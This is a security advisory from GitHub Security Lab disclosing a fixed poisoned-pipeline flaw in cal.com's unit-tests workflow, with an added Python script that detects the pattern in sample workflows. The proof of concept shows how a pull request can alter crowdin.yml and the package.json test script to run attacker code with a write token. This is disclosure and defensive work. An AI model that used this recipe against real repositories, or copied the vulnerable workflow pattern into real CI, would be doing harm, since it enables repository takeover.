## Coordinated Disclosure Timeline

- 2024-07-12: Reported through GitHub’s Private Vulnerability Reporting (PVR).
- 2024-07-23: Fix is merged.
## Summary

The `unit-tests.yml` GitHub workflow is vulnerable to arbitrary code execution.
## Project

cal.com

## Tested Version

Latest commit at the time of reporting.
## Details

### Poisoned Pipeline Execution on `unit-tests.yml` (`GHSL-2024-163`)

The `unit-tests.yml` workflow runs when the `crowdin.yml` workflow completes (a `workflow_run` trigger). Even though the Crowdin workflow runs on the `push` event, an attacker could send a PR that changes its trigger event to `pull_request`, so that the PR itself would cause the `unit-tests` workflow to run.

The `unit-tests` workflow then checks out untrusted code:

```yaml
- uses: ./.github/actions/dangerous-git-checkout
```

and runs commands such as `yarn test` that could be poisoned by an attacker able to change the `package.json` file.

The `unit-tests` workflow runs with full write permissions, and therefore an attacker could take over the repository.
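The chain above has three ingredients that can be checked mechanically: a privileged trigger (`workflow_run`, or `pull_request_target`), a checkout of the pull request's head, and a command that executes scripts defined in the checked-out tree, all with a write-capable `GITHUB_TOKEN`. The following audit script is an added example written for this advisory, not code from the cal.com project or from GHSL. It takes workflows as Python dicts in the shape a YAML parser would produce (an assumption made so the example runs without PyYAML; real YAML parses the `on` key as the boolean `True`, which the helper also accepts). The sample workflows, file names and the `release-preview.yml` variant using `actions/checkout` with a `workflow_run.head_sha` ref are constructed to mirror the pattern described above and generalise it beyond the repo-local checkout action.

```python
"""Flag the poisoned-pipeline shape: privileged trigger + untrusted checkout +
tree-controlled command, and report whether the job's token is write-capable."""
import re

# Events whose runs get secrets and (by default) a write-capable token even when
# the change that led to the run came from a fork.
PRIVILEGED_EVENTS = {"workflow_run", "pull_request_target"}

# Commands whose behaviour is defined by files in the checked-out tree
# (package.json scripts, Makefile targets), i.e. attacker-controlled code.
TREE_CONTROLLED_CMD = re.compile(r"\b(?:yarn|npm|pnpm)\b(?:\s+run)?\s+\w+|\bmake\b")

# checkout refs that point at the head of the triggering pull request / run.
PR_HEAD_REF_HINT = re.compile(r"github\.event\.(?:pull_request\.head|workflow_run\.head)")


def triggers(workflow):
    """Return the set of event names a workflow listens on ('on' or YAML's True key)."""
    on = workflow.get("on", workflow.get(True, {}))
    if isinstance(on, str):
        return {on}
    if isinstance(on, list):
        return set(on)
    return set(on.keys())


def checks_out_untrusted(step):
    """True if the step fetches code from the triggering PR rather than the base branch."""
    uses = str(step.get("uses", ""))
    if "checkout" in uses and "dangerous" in uses:
        return True  # repo-local helper named like ./.github/actions/dangerous-git-checkout
    if uses.startswith("actions/checkout"):
        ref = str((step.get("with") or {}).get("ref", ""))
        return bool(PR_HEAD_REF_HINT.search(ref))
    return False


def token_is_write(workflow, job, default_write=True):
    """Resolve the effective GITHUB_TOKEN permissions for a job.
    default_write is an assumption about the repository's default token setting;
    the advisory states this workflow ran with full write permissions."""
    perms = job.get("permissions", workflow.get("permissions"))
    if perms is None:
        return default_write
    if perms == "read-all" or perms == {}:
        return False
    if perms == "write-all":
        return True
    return any(v == "write" for v in perms.values())


def find_poisoned_pipelines(workflows, default_write=True):
    """Return one finding per job that runs tree-controlled commands on an untrusted
    checkout inside a privileged workflow. 'token' says how bad it is: a read-only
    token limits repository takeover but the untrusted code still executes."""
    findings = []
    for name, wf in workflows.items():
        if not (triggers(wf) & PRIVILEGED_EVENTS):
            continue
        for job_name, job in wf.get("jobs", {}).items():
            steps = job.get("steps") or []
            untrusted = any(checks_out_untrusted(s) for s in steps)
            tree_cmd = any(TREE_CONTROLLED_CMD.search(str(s.get("run", ""))) for s in steps)
            if untrusted and tree_cmd:
                findings.append({"workflow": name, "job": job_name,
                                 "token": "write" if token_is_write(wf, job, default_write) else "read"})
    return findings


# Constructed sample workflows (not the project's real files).
SAMPLE_WORKFLOWS = {
    # Same shape as the advisory: runs after another workflow, repo-local checkout
    # of the PR head, runs a package.json script, no permissions block.
    "unit-tests.yml": {
        "on": {"workflow_run": {"workflows": ["Crowdin Action"], "types": ["completed"]}},
        "jobs": {"test": {"runs-on": "ubuntu-latest",
                          "steps": [{"uses": "./.github/actions/dangerous-git-checkout"},
                                    {"run": "yarn test"}]}},
    },
    # Same job with a read-only token: impact reduced, code execution not removed.
    "unit-tests-readonly.yml": {
        "on": {"workflow_run": {"workflows": ["Crowdin Action"]}},
        "permissions": {"contents": "read"},
        "jobs": {"test": {"steps": [{"uses": "./.github/actions/dangerous-git-checkout"},
                                    {"run": "yarn test"}]}},
    },
    # Untrusted code run only in an unprivileged pull_request workflow: not flagged.
    "unit-tests-safe.yml": {
        "on": {"pull_request": {}},
        "jobs": {"test": {"steps": [{"uses": "actions/checkout@v4"}, {"run": "yarn test"}]}},
    },
    # Generalisation: stock checkout action pinned to the triggering run's head SHA.
    "release-preview.yml": {
        "on": {"workflow_run": {"workflows": ["CI"]}},
        "jobs": {"build": {"permissions": {"contents": "write"},
                           "steps": [{"uses": "actions/checkout@v4",
                                      "with": {"ref": "${{ github.event.workflow_run.head_sha }}"}},
                                     {"run": "npm run build"}]}},
    },
}

if __name__ == "__main__":
    for f in find_poisoned_pipelines(SAMPLE_WORKFLOWS):
        print(f"{f['workflow']}: job '{f['job']}' runs untrusted code with a {f['token']} token")
```

Run as-is it reports `unit-tests.yml`, `unit-tests-readonly.yml` and `release-preview.yml`, and leaves `unit-tests-safe.yml` alone. The `token` field is deliberately not a pass/fail verdict: restricting `permissions` shrinks the blast radius, but the remediation the pattern calls for is to stop checking out and executing pull request code inside a `workflow_run` or `pull_request_target` job at all.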
## PoC

Create a new Pull Request with two changes:

- Change `crowdin.yml` to:

```yaml
name: Crowdin Action
on:
  pull_request:
jobs:
  trigger:
    runs-on: ubuntu-latest
    steps:
      - run: echo "Triggered"
```

- Change the `package.json` scripts section to include a new script for `test`:

```json
...
"scripts": {
  ...
  "test": "echo PWNED",
  ...
},
...
```
## Impact

The issue may lead to repository takeover.
## Resources

- CodeQL for JavaScript - Expression injection in Actions
- Keeping your GitHub Actions and workflows secure Part 2: Untrusted input
- Keeping your GitHub Actions and workflows secure Part 1: Preventing pwn requests
## Credit

This issue was discovered and reported by GHSL team member @pwntester (Alvaro Muñoz).
## Contact

You can contact the GHSL team at securitylab@github.com; please include a reference to `GHSL-2024-163` in any communication regarding this issue.